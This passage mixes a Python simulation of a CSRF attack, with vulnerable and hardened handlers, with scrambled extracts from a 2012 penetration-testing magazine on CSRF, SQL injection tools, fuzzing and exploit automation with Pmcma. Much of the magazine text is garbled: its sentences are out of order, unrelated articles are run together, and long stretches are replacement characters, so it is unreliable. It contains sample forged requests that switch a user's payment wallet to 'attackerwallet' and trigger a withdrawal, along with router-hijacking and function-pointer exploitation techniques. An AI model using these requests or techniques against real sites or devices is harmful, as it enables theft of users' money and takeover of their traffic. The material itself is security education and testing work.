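        return 403        # a page on hackhost cannot read the token out of the admin's page
    if not request_from_own_site(headers):
        return 403        # browsers set Origin on cross-site POSTs; page script cannot forge it
    profile["email"] = form["email"]
    return 200


def run_scenario(handler, jar, initiator_url, form):
    """One auto-submitted POST to the profile editor from a page at initiator_url, passed
    through the browser model into the handler.  Returns (status, resulting email)."""
    target = SITE + "/panel.php?act=editprofile"
    cookies = cookies_to_send(jar, target, initiator_url, top_level=False, method="POST")
    headers = {"Origin": site_of(initiator_url)}
    profile = {"email": "admin@targethost"}
    return handler("POST", cookies, form, headers, profile), profile["email"]


if __name__ == "__main__":
    sid = new_session("admin")
    forged = {"email": "hacker@hack.host"}
    print("legacy cookie, vulnerable:", run_scenario(edit_profile_vulnerable, {"sid": (sid, "None")}, "http://hackhost/1.jpg", forged))
    print("legacy cookie, hardened:  ", run_scenario(edit_profile_hardened, {"sid": (sid, "None")}, "http://hackhost/1.jpg", forged))
    print("Lax cookie, vulnerable:   ", run_scenario(edit_profile_vulnerable, {"sid": (sid, "Lax")}, "http://hackhost/1.jpg", forged))
```

Two caveats the articles already hint at: a Lax cookie is still attached to a top-level GET navigation, so the bank's GET-based transfer stays exposed unless the action moves to POST; and neither the token nor the Origin check helps once there is XSS on the same origin, because injected script can read the token and make a same-origin request, which is exactly why the e107 hybrid works.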
Which belong to the class Cross-Site Request Forgery (WASC-09) [2].) to attacker’s wallet. which I happened to meet many times at different e-commerce sites. (i. Which I’ll tell you about in this article. The essence of such attack comes from conducting a CSRFattack on the user with the purpose of manipulation of his finances (and functionality of the site being used exactly as it was intended by its developers). Taking into account that Business Logic flaws logical vulnerabilities. there are also client-side ones. But besides server-side Business Logic vulnerabilities. by decreasing finances of the user of the site. etc. Which allows an attacker to manipulate financial data in web applications. There are two types of Business Logic flaws: serverside and client-side.XSS & CSRF Business Logic Vulne-rabilities via CSRF Cross-Site Request Forgery (CSRF) vulnerabilities can be used for different nasty things. Conduct second CSRF-attack on the user to initiate withdrawing of money (to wallet specified in the account).g. to change his wallet (e. And I have found both types of such vulnerabilities many times since 2005. In two steps scenario the attack will be the next: • • Send request to change the wallet: http://ecommerce/user?wallet=attackerwallet Send request to withdraw money: http://ecommerce/user_money?withdraw=1 http://pentestmag. because process of changing the wallet and withdrawal of money is divided into separate functionalities. which was not expected by its developers. PayPal.e. such as the ones used for online-banking. but the most dangerous one is stealing of money from users’ accounts. But if at a vulnerable site these two operations are joined into one functionality. 01/2012 Example of Business Logic CSRF Example of such vulnerability. abusing occurs of the functionality for withdrawing of money from a user’s account). WebMoney. First one allows the user of the site to manipulate the site’s functionality to increase his finances. 
The attack occurs at special using of functionality of the site. the scenario of the attack will be the next: • • Conduct CSRF-attack on the user. it’s manipulation with withdrawing of money to electronic wallets. A mong vulnerabilities found in web applications there are logical vulnerabilities such as Business Logic flaws. Usually two steps of the attack (two requests) are required. With the existence of CSRF vulnerabilities at the site. And the second type of these vulnerabilities is more widespread then the first one. then they belong to class the Abuse of Functionality (WASC-42) [1]. EPS and other ecommerce sites. then it’s possible to send one request – for withdrawal of money to a specified wallet. It is the server-side type. Attackers can DoS them. So attackers can conduct remote CSRF attacks on network devices. such as routers. which allow users to access the Internet. there are also vulnerabilities in the admin panels of different network devices. to do many different nasty things.XSS & CSRF CSRF Attacks on Network Devices Similar to vulnerabilities in web applications on web sites. when such devices resides in a LAN. are typically affected devices. especially CSRF. including Cross-Site Request Forgery (CSRF) vulnerabilities. that attacker will take control of the traffic – all traffic (such as DNS requests) will be send via his own server. allowing him to sniff confidential data and conduct phishing attacks on all users in a LAN who are using these devices to access the Internet. Let’s take a look at two attacks. Because it’s possible to setup these devices in such way. Callisto 821+ it’s ADSL Router (and similar vulnerabilities can be in all other devices from Iskra). Wi-Fi Access Points. Such vulnerabilities exist in different network devices. In the first scenario the attacker will conduct part of the actions remotely and part manually http://pentestmag. 
– from malicious local attackers or viruses – so developers should not leave their devices with remote or local vulnerabilities.). These can be attacked remotely via CSRF from the Internet.com Page 124 . The DAP 1150 is a Wi-Fi Access Point and router (similar vulnerabilities can be in all other devices from D-Link). D-Link DSL-500T ADSL Router and D-Link DAP 1150. Wi-Fi Access Points and others. which has computers with access to Internet (CSRF attacks can be conducted via the browsers of the users at these computers). etc. Which can be attack similarly to web sites – by attacking users who have access to these network devices. A lmost all network devices are vulnerable to CSRF [1] due to misunderstanding of this threat by developers of such devices. For external attackers the most interest represent such network devices as routers and other devices with router-functionality (ADSL modems. And by using CSRF attacks on these vulnerabilities the attacker can receive full control of these devices. such as Iskra Callisto 821+. disable different functionalities and change different settings. vulnerabilities in which I’ve found and disclosed at my site. Not mentioning that there is also a threat of local attacks 01/2012 Let’s see how real attacks can be conducted on example of Iskra Callisto 821+ and D-Link DAP 1150. But it’s not true. because they think that devices will reside in a LAN and will not accessible from Internet. For example routers and ADSL modems. Possibilities of CSRF Attacks on Network Devices Real attacks on Network Devices Developers of network devices don’t attend enough to security (vulnerabilities in such devices are found all the time). There can be different attacks created. which allows them to take devices under full control (and take control on the user\s’ traffic through these devices). which are very advantageous for the attackers. an attacker may be able to read database contents or even write to the database. 
Once you have executed the program.com . Figure 1. Enables easy transport of logging data – All of the data gathered from NTO SQL Invader can be saved into a CSV file so the reports can be included as penetration evidence as part of a presentation or proof of concept. In this article.SQL INJECTION NTO SQL Invader SQL Injection is an attack in which the attacker manipulates input parameters that directly affect an SQL statement. It gives the ability to quickly and easily exploit or demonstrate SQL injection vulnerabilities in Web applications. He/she can then control how much information is gathered. NTO SQL Invader provides the data in an organised manner that is useful for executive meetings as well as technical analysis and remediation. It has been designed to assist a penetration tester in demonstrating the impact of SQL injection vulnerability in a web application penetration test.com. NTO SQL Invader is available from: ntobjectives. Exploit KB Vulnerable Web App main page 01/2012 Page 128 http://pentestmag. With a few simple clicks. the following screen will be displayed: Figure 1. NTO SQL Invader main screen Figure 2. N • TO SQL Invader is a SQL injection exploitation tool. This usually occurs when no input sanitisation is conducted. NTO SQL Invader has the following features: Easy to use – The graphic user interface of the tool enables a penetration tester to simply paste an injectable request found by a web application vulnerability scanner or feed a detailed request straight from a web application scan report. the author will show you how to exploit SQL injection vulnerability using NTO SQL invader. • • Clearly presents evidence – Unlike other SQL injectors that provide all data via command line. tables and user accounts of the back-end database. Depending on permissions. a penetration tester will be able to exploit a vulnerability to view the list of records. 
Global���������������� Management Recruitment ������������������������������������������������������������������� ������������������������������������������������������������������������������������������������������������ ����������������������������������������������������������������������������������������� ��������������������������������������������� ��������������������������������������������������������������������������������� ����������Permanent ������������������������������������������������������������������������������������������������������������� ���������������������������������������������������������������������������������������������������������� ����������������������������������������� ����� � ��������������������������������������������������������������������������������������������������������� ����������������� ����� � ����������������������������������������������������������������������������������������� ����� � ���������������������������������������� ����� ���������������������������������������������������������� ����� � ������������������������������������������������������������������ ����� ��������������������������������������������������������������������������������������������� ����� � ��������������������������������������������� ����� �������������������������������������� ����� � ������������������������� ����������� ����� ������������������� ����� ����������������������������������� ����� ������������������������������������������ ����������������������������������������������������������������������������������������������������������������������������������������� ���������������������������������������������������������� ���������������������������������������������������������������������������� �������������������� �������������������������������������������������������������������������������������������������������������������� 
��������������������������������������������������������������������������������������������������������� ���������������� ����� ��������������������������������������������������������������������������������������������������������������� ������������ ����� ������������������������������������������������������������������������������������������������������������ ������������ ����� � �������������������������������������������������������������������������������������������������������������� ������������� ����� ������������������������������������������������������������������������������������������������������������� ��������������������������� ����� ������������������������������������������������������������������������������������� ����� � ������������������������������������������������������������������������������������������������� ������������� ����� � ����������������������������������������������������������������������������������������������������������� �������������� ����� ��������������������������������������������������������������������������������������������������������� ����� ���������������������������������������������������������������������������������������������� ����� � ������������������������������������������������������������������������ ������������������������������������������������������������������������������������������������������������������������������������������������� �������������������� �������������������������� �������������� �������������� ���������� ������������������� ��� ��������������������� ������ ����������������� ���������������� ����������������������� . Figure 3. Netsparker community edition scan results Figure 4. Netsparker community edition successfully obtained the version of back-end database Figure 1.com . This usually occurs when no input sanitisation is conducted. which can detect and report potential website security problems and allow you to resolve them before they are used by hackers. 
SQL Injection Tools for Windows Netsparker community edition is a powerful web application vulnerability scanner. Netsparker community edition main screen Figure 2. the author will show you how to perform SQL injection pen-testing using open source and free tools available for Windows and Linux. an attacker may be able to read database contents or even write to the database. Depending on permissions. Havij free version main screen 01/2012 Page 132 http://pentestmag. I n this article.SQL INJECTION SQL Injection PenTesting using Open Source and Free Tools SQL Injection is an attack in which the attacker manipulates input parameters which directly affect an SQL statement. ������������ ������� ����������������������������������������������������� ���������������������������������������������������� �������������������������������������������������� ��������������������������������� ��������������������������������������������������� ��������������������������������������������������������� ������������ ���������������������������������������������������� ������������������������������������������������������ ����������������������������� ������������� ��������������� �������������������������������������� ������������������������ . Through SQL Injection. the attacker may input specifically crafted SQL commands with the intent of bypassing the login form authentication mechanism. e-commerce checkout systems. the legitimate user should be granted the appropriate access for their account to the web application. The attack tries to convince the application to run SQL code that will result in access that was not intended by the application developers. When the legitimate user submits their information.com Page 142 . Data such as: User credentials. a SQL query is generated from this information and submitted to the database for verification. suppliers. PII. and anything other data that a legitimate user may need access to through a web portal. 
Many of these features users take for granted and demand in modern websites to provide businesses with the ability to communicate customers. SQL Injection is the attack technique which attempts to pass SQL commands through a web application for execution by the backend database. D atabases are the backbone of most commercial websites on the internet today. confidential company information. Backend databases contain lots of juicy information that an attacker may be interested in. If not sanitized properly. A Simple SQL Injection Example Take a simple login page where a legitimate user would enter his username and password combination to enter a secure area to view his personal details or upload his comments in a forum. employees. The attacker uses SQL queries and creativity to bypass typical controls that have been put in place. and business partners).SQL INJECTION SQL Injection Inject Your Way to Success SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. The web application in question that controls authentication will communicate with the backend database through a series of commands to verify the username and password combination that was submitted. PII. 01/2012 a myriad of user submit able forms and the delivery of dynamic web content. Common web application features introduce the SQL injection attack vector. These website features are may be susceptible to SQL Injection attacks and are good place to start during a pentest engagement that includes a web application testing component. web applications may result in SQL Injection attacks that allow hackers to view or modify information from the database. search pages. This is only possible if the inputs are not properly http://pentestmag. Once verified. These features include login pages. At its most basic form. It is (as of the time of writing) ranked as the top web application security risk by OWASP [1]. 
web applications allow legitimate website visitors to submit and retrieve data over the Internet using nothing more than a web browser which allow the internet to be the giant consumer market that it is. SQL Injection is one of the most common vulnerabilities in web applications today. They store the data that is delivered to website visitors (including customers. please apply with a resume to
[email protected]. nationally and internationally.au . If you are an experienced security consultant with a thorough understanding of Networking.au and quote reference PTM-TS-12. Since our inception in 2002.com. We thrive on team work. Operation Systems and Application Security. service excellence and leadership through research and innovation. our company has performed tremendously well. Protection and Sense of Security Sense of Security is an Australian based information security and risk management consulting practice. We are seeking talented people to join our team.au www.Now Hiring Teamwork Innovation Quality Integrity Passion Compliance.com. From our offices in Sydney and Melbourne we deliver industry leading services and research to our clients locally.com. info@senseofsecurity. typically the places where any attacker controlled data can enter into the system and the application starts processing it. command injections. As a QA resource. we tend to re-use most of the legacy code from the previous release and then work on the new features and bug-fixes only. network sockets. Some of us think that the researcher actually reversed engineered the code to find this issue. the general interest in identifying network. we would be using the same “conformance test suite” or the same “stress test suite” to ensure that the new builds are working as expected. we would talk about a few open source tools which are used by security researchers to spot vulnerabilities in our products even if they have zero or a very minimal knowledge of the product. etc. the money you get it quite decent. it can never be detected by a fuzzer. The entry points for user controlled or tainted data is identified in the application. or he has access to some very specialized hardware and software to spot these issues. Another class of vulnerability is design level vulnerability. 
you get paid anything from 5000 USD to 40000 USD depending on the width of deployment of the product targeted and the severity of the issue. format string vulnerability. fuzzers are intended to target implementation level flaws only. In the industry. dll. Fuzzers typically have a stored dictionary of strings and integers which it uses at appropriate places iteratively.FUZZING Fuzzing for Free State of Art and Upcoming Research As a developer working on a product release. we either have implementation for http://pentestmag. in this article. the motivation to work in security research has gone exponentially high in the last few years. files and activeX controls. activex controls. by definition. Hence. xss injections. Here. it would try all possible values of strings from its dictionary and further mutations of these strings. registry entries. All of these can be grouped as implementation level flaws only. Hence. Fuzzing is one of the most commonly used techniques for identifying security flaws in any application. sql injection. as some of us prefer to call them) sends an email to your security response team telling about an exploitable buffer overflow in your product. In this article. emails. Hence. If there is a design flaw in a network protocol which allows for a man-in-the-middle attack. if you disclose an exploitable vulnerability to ZDI with its proof of concept (PoC). These are files. These strings typically target standard vulnerability classes like buffer overflow. The reality is far more simple and costeffective. if you can compromise a machine by exploiting some product on it from the network. B ut what troubles us the most is that some security researcher (or hacker. file and web based vulnerabilities is consistently growing amongst the 01/2012 researchers. Network Fuzzers One commonly targeted attack surface is network protocols. we would discuss some state of the art open source tools which can be used for fuzzing networks. 
The model of payment by ZDI and many similar companies is that. etc. Introduction With companies like ZDI out there in the market to pay for every vulnerability you find. directory traversal.com Page 150 . If the fuzzer identifies some part of the input as a variable string. Sulley Fuzzing Framework Sulley is an Open Source project. while other components of the framework are monitoring all processes and network events related with each test. you can find your own 0-day vulnerabilities! In this article we are going to describe how we can use Sulley Fuzzing Framework with a real vulnerable FTP Server. in order to produce errors in normal software operation. but also can be used by security staff or software deverlopers. Check it. Since a software error is usually a potential security threat. F uzzing is a technique used in software security testing in which lots and lots of abnormal input data are sent to the software. Sulley Framework stores all data related to the crash.. and then the framework generates a complete set of tests based on mutations of the given grammar. using a simple grammar.. and. It can be very useful in order to understand the weakness and correct (or exploit) it. the protocol to fuzz. Sulley provides the tester with a.com . When an abnormal response happens. written in Python. powerful framework where he can describe.FUZZING Fuzzing with Sulley Can you write a simple python script? Can you understand a network protocol and describe it using a simple object set? If so. try it on your own software. Each test of this set is checked against the fuzzed software. network. Sulley from Monsters Inc. of course. Fuzzing is usually used by attackers in order to discover unknown vulnerabilities.. Figure 2. enjoy. and much more. Figure 1.. so the tester has all the information regarding the CPU registers. Fuzzing is a great technique to detect security flaws. that try to be a new standard in fuzzing software. stack. 
Sulley Architecture 01/2012 Page 154 http://pentestmag. in order to test their software strenght against this kind of attacks. F uzzing is all about finding vulnerabilities or errors in applications. Example: Fuzzing FTP server with FTP Fuzzers.FUZZING Fuzzing with WebScarab Although there are ample techniques to identify vulnerabilities in software. Fuzzing along with penetration testing covers this gap and discovers unknown vulnerabilities. Fuzzing is one of the techniques for automating security assessment. called fuzz. fuzzing is the best technique as it is cost effective and enhances software security as it often finds odd lapses and vulnerabilities through automated or semi-automated process followed by manual expert reviews. It is possible to enumerate the target which may go into an uncertain state which results in a security vulnerability. Response from the server is manually reviewed to identify vulnerabilities or errors. preferred parameters or parts of the session are altered and sent to the server or application. they discover known security issues and other low hanging fruit. but they are not as efficient as explicit fuzzing. Generic fuzzing involves lot of manual inputs from the users and only experienced users can able to use these types of tools. Generic Fuzzing Generic fuzzing involves tool analysis to identify vulnerabilities on array of protocols. A Fuzzer is a tool which successively picks a value from a fuzz template to replace user-specified parameters in a request sent to the server. operating systems and networks by injecting large amount of arbitrary data. it is possible that the application will go into an uncertain state which results in a security vulnerability. Fuzzing covers the vital attack surfaces in a system fairly well. There are different fuzzing methods depending on how the fuzzer is used depending on the input parameters. Explicit Fuzzing Fuzzing Overview And Requirements Fuzzing enables security engineers. errors. 
During fuzzing. Fuzzing is useful in evaluating black box systems. developers and testers to locate defects.com Page 158 . Since this method enables fuzzer tool to change data that already exists. identifies many common errors. Session Fuzzing Introduction To Fuzzing Why fuzzing? Where does it fit? What are its limitations? Vulnerability scanners are imprudent. and vulnerabilities produced by abnormal values via user inputs. 01/2012 Explicit fuzzing involves building of specific fuzzing tools for specific applications or servers. as it does not involve any access to source code and can be performed without knowing the inner mechanism of the target system. Example: Protocols Fuzzing Tools such as Spike http://pentestmag. Example: Incrementing session ids of a web application. probable vulnerabilities quickly and economically. Session fuzzing involves analysis of valid sessions of the application or the server. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage. Software-based fuzzers are scalable in performance. Using hardware test beds: Appliance based fuzzing tools become outdated really fast. if the anomalous data causes abnormal reaction such as a crash in the target software. they almost always choose the quick and dirty solution. and can select other test completion criteria. where you can easily copy the setup to your colleagues.the same method that is used by hackers and security researchers when they look for weaknesses to exploit. or upload it to cloud setups. ��������������������� ��������������� ������������������������� ��������������������� ������������������������� ������������������������������� �������������������� ������������������������������������ ������ ��������������������������� . In this article. Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software. but to really target the areas that are most at risk. 
but in QA you cannot expect that all testers understand what buffer overflows are. Be prepared for virtual setups. then you have found a critical security flaw. How to distinguish a good fuzzer. Scalable: Time is almost always an issue when it comes to testing. Sometimes you can use more time in testing. it needs to be documented for your internal developers or for vulnerability management towards third party developers. A good fuzzer will create test cases automatically. There are abundance of fuzzing tools available. and the speed requirements for the hardware increases each year. Automated: Creating fuzz test cases manually is a time-consuming and difficult task. There are no false positives. and are not locked to a physical test lab.WHAT IS A GOOD FUZZING TOOL? Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target . and can easily travel with you where testing is needed. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks. User must also have control on the fuzzing parameters such as test coverage. what are the qualities that a fuzzing tool should have? Model-based test suites: Random fuzzing will certainly give you some results. Test coverage: Better test coverage means more discovered vulnerabilities. the test cases need to be based on actual protocol models. In QA you rarely have much time for testing. MOST COMMON MISTAKES IN FUZZING Not maintaining proprietary test scripts: Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported. This is almost always random fuzzing. Remediation: All found issues must be reproduced in order to fix them. automated documentation is the only possible solution. 
we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing. Unprepared for cloud: A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests. When there are billions of test cases. Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the developers so that they can start developing a fix to the found issues. so that testers only need the domain expertise from the target system to execute tests. and therefore need to run tests fast. This results in huge improvement in test coverage and reduction in test execution time. Fuzzing tool must come with all the security knowhow built-in. Ticking off the fuzzing check-box: If the requirement for testers is to do fuzzing. PROPERTIES OF A GOOD FUZZING TOOL Documented test cases: When a bug is found. Easy to use: Most fuzzers are built for security experts. Invalid memory dereferences in read mode used for information leakage purpose or indirect memory exploitation will also be discussed near the end of this article. fixing software seems easier..org/ under the Apache 2. we will focus on a new approach we will examine exploitability in a systematic way. the presence of security 01/2012 countermeasures such as ALSR. In fact.MEMORY CORRUPTION Introduction to Exploit Automation With Pmcma (Part I) Earlier this year.. The following article is an introduction to Pmcma. integer overflow. Paradoxically. and practically for the vast majority of computer programs actually used nowadays. Writing exploits is hard. Determining exploitability is hard. A methodology to find all the function pointers exploitable by truncation in case of an arbitrary write subject to conditions (such as not controlling the value being dereferenced). exploit writing automation is desirable. 
MEMORY CORRUPTION

Introduction to Exploit Automation With Pmcma (Part II)

Earlier this year, we released a tool called Pmcma (Post Memory Corruption Memory Analysis) at the Blackhat US security conference. The tool is available free and open-source at http://www.pmcma.org/ under the Apache 2.0 license. The following article is an introduction to Pmcma. In addition, advanced readers can refer to the full Blackhat whitepaper mirrored on the Pmcma website [0].

Determining exploitability is hard. Not too surprisingly, writing exploits is hard too. In particular, proving unexploitability is provably unfeasible in the general case, due to theoretical limitations hopefully known to the reader of this paper (aka: the halting problem). So what you can get at best is a "it's not doable given the state of the art of exploitation". It is also quite hard. Why is that? Well, maybe because virtually all the debugging tools available focus on what is happening before a memory corruption, rather than on what happens from there.

Determining exploitability and writing exploits is a difficult task, given a fixed set of input data. For these reasons, they are two sides of the same coin. In this paper, we focus on what happens in memory after the bug is triggered, rather than tracing or backtracking what has happened before. Our goal is to help exploit (semi)automation by building exploitation models based on constraints gathered from the environment. Public knowledge, common sense, hardware[4] enhancements, non executable memory, and compiler enhancements such as Data Hardening allow for their practical testing in order to (in)validate them. We will primarily focus on invalid memory write bugs (such as invalid dereference of pointers during a write operation, for instance due to a missing format string, or any other corruption bug) because of the special role they play in modern exploitation.

The main contributions of Pmcma are:
• A methodology to discover all the potential function pointers inside the address space of a process at any given point in time.
• A methodology to discover all the function pointers actually dereferenced by a process from a given point in time.
• A methodology to find all the unaligned memory reads from a given point in time during the execution of a process.

The second part of the article describes pmcma, focusing on attacking function pointers, simulating arbitrary reads, detecting unaligned memory accesses and finally automating analysis and exploitation scenarios.

Attacking Function Pointers

Now that we have a way to experiment on various modifications of a given process' address space, how do we find function pointers? Well, let's get back to the definition of a function pointer. It is a variable, hence in a writable section, which points to a function. And functions are all in executable sections. The majority of times a function starts with a standard prologue. So what we do (in pseudo code) is: see Listing 1.

Two things are worth mentioning: first off, we may miss a few pointers if we use this algorithm, because some functions may not start with a standard prologue. This is very time saving and works well in practice though. Secondly, the list of pointers we get this way (by a pure static analysis) is a list of _potential_ function pointers. They may just happen to be variables that luckily point to a valid function's entry point. More importantly, it doesn't give us the list of function pointers actually being dereferenced between a given point in time (eg: the one where we found, say, an invalid write condition) and another (either the process exit, or the return to this very same instruction in case of loops).

To detect those, we're going to use the mk_fork() technique. The algorithm is as follows: see Listing 2. By default, pmcma uses the value 0xf1f2f3f4 as a remarkable value, which is obviously never correct from userland. This value can be changed from the command line. To the best of my knowledge, this is the first proposed technique to exhaustively enumerate all the function pointers inside a process between two points in time, and is quite remarkable.

Let's see how this would work inside pmcma on a simple example, by listing the function pointers from a given point in /bin/su: see Listing 3. We found 5 function pointers that are actually being dereferenced by /bin/su before exiting. To verify we actually got something relevant, we can read the message logs from the kernel:

jonathan@blackbox:~$ dmesg |tail -n 1
[ 7472.786312] su[20879]: segfault at f1f2f3f4 ip f1f2f3f4 sp bfcab4e8 error 15
jonathan@blackbox:~$

So using the strict mode, we found 0 potential function pointer to overwrite. This was anticipated. Fortunately, pmcma allows to test all of the pointers to +X zones pointing to a valid assembly instruction, hence limiting false positives, just by passing it the --relaxed flag; in such a case, the application will then try the relaxed mode: see Listing 4.

http://pentestmag.com • 01/2012
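The Listing 1 idea (walk the writable sections, keep every aligned value that lands inside an executable section, and in strict mode require a standard prologue at the target), as an added Python example that is not pmcma's own code. The mappings, addresses and bytes are constructed, and the relaxed mode here is simplified to "target lies in an executable section" rather than pmcma's valid-instruction check.

```python
import struct

# Standard x86 function prologue: push ebp; mov ebp, esp
PROLOGUE = b"\x55\x89\xe5"


def build_sample_space():
    """Constructed 32-bit address space: (base, bytes, perms) per mapping."""
    text_base = 0x08048000
    text = (b"\x90" * 0x10             # padding, not a function start
            + PROLOGUE + b"\xc9\xc3"   # function A at text_base+0x10 (has prologue)
            + b"\x90" * 0x0b
            + b"\x31\xc0\xc3"          # function B at text_base+0x20 (no prologue)
            + b"\x90" * 0x0d)
    data_base = 0x0804A000
    data = struct.pack("<IIII",
                       text_base + 0x10,   # real function pointer (prologue)
                       text_base + 0x20,   # into +X, but not a standard prologue
                       0x41414141,         # ordinary variable, not an address
                       data_base + 0x4)    # points into a writable, non-executable section
    return [(text_base, text, "r-x"), (data_base, data, "rw-")]


def find_function_pointers(mappings, relaxed=False):
    """Return (variable_address, target) for aligned 32-bit values in writable
    sections whose target lies in an executable section. Strict mode (default)
    additionally requires the target to start with PROLOGUE."""
    exec_maps = [m for m in mappings if "x" in m[2]]
    found = []
    for base, data, perms in mappings:
        if "w" not in perms:
            continue
        for off in range(0, len(data) - 3, 4):
            value = struct.unpack_from("<I", data, off)[0]
            for ebase, edata, _ in exec_maps:
                if ebase <= value < ebase + len(edata):
                    if relaxed or edata[value - ebase:].startswith(PROLOGUE):
                        found.append((base + off, value))
    return found


if __name__ == "__main__":
    space = build_sample_space()
    print("strict :", [hex(v) for _, v in find_function_pointers(space)])
    print("relaxed:", [hex(v) for _, v in find_function_pointers(space, relaxed=True)])
```

Strict mode reports only the pointer to function A; relaxed mode also reports the pointer to function B, which is exactly the extra candidate set (and the extra false-positive risk) the text describes.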